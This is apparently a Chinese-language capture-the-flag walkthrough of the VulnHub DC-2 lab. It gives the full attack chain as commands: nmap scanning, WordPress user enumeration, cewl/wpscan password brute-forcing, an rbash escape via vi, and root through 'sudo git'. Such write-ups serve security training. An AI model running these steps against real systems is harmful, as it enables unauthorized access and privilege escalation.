一、环境搭建
DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip
kali:192.168.144.148
DC-2:192.168.144.150
添加hosts文件:192.168.144.150 DC-2
二、渗透流程
nmap -A -T5 -sV -sT -p- 192.168.144.150
开放端口:80(web)、 7744(ssh)
访问:192.168.144.150,web页面获取到flag1
flag1提示使用
cewl工具
进行暴力破解
进行目录扫描,获取到后台登录地址:http://dc-2/wp-admin
使用wpscan
对wordpress用户进行枚举:wpscan --url http://dc-2 -e u
获取到三个用户:admin、jerry、tom
利用cewl工具生成密码字典:
cewl http://dc-2 -w passwd.txt
生成用户字典:
vim user1.txt
使用wpscan进行爆破:
wpscan --url http://dc-2 -U user1.txt -P passwd.txt
获取到了
jerry:adipiscing
、tom: parturient
,登录后台,获取到flag2
flag2提示,如果此路不通,尝试另一种方法,尝试7744端口
ssh连接
tom登录成功
执行
ls命令
,发现flag3
rbash
限制,cat无法执行,vim无法执行,vi可以执行
flag3提示可以尝试切换一下用户
使用vi突破rbash
vi
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
su jerry
成功切换到jerry
成功访问到
flag4
查看是否有可以提权的命令:
find / -perm -u=s -type f 2>/dev/null
sudo -l
:发现git可以利用,flag4也提示了可以使用git
sudo git help config
:进入文本模式
!/bin/bash
:获取shell
获取最后的
final-flag.txt
三、思路总结
1、nmap端口扫描,添加hosts文件,访问web页面;
2、dirb目录扫描获取后台登录地址;
3、cewl暴力破解获取后台登录账户;
4、ssh远程连接;
5、vi突破rbash切换用户;
6、git提权;